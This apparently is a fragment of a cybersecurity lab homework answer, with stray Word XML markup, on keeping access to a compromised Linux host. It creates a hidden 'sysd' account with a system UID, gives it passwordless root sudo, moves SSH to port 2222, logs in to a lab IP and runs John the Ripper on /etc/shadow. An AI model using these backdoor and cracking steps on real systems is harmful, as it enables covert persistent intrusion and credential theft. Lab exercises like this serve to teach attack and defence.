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Shadow People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secret user named sysd. Make sure this user doesn't have a home folder created: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adduser sysd -no-create-home -uid 11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a password:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">passw0rd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a system UID &lt; 1000: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See above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the same GID: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full sudo access without the need for a password:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Sudo visudo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sysd ALL=(ALL:ALL) NOPASSWD:ALL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that sudo access works without your password:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Su sysd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Sudo nano /etc/passwd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Smooth Sailing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Edit the sshd_config file:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Port 22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Port 2222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Restart the SSH service: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Service ssh restart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sshd restart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Exit the root account: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SSH to the target machine using your sysd account and port 2222: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ssh sysd@192.168.6.105 -p 2222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sudo to switch to the root user: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sudo su root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Crack All the Passwords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SSH back to the system using your sysd account and port 2222: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ssh sysd@192.168.6.105 -p 2222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Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file: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John /etc/shadow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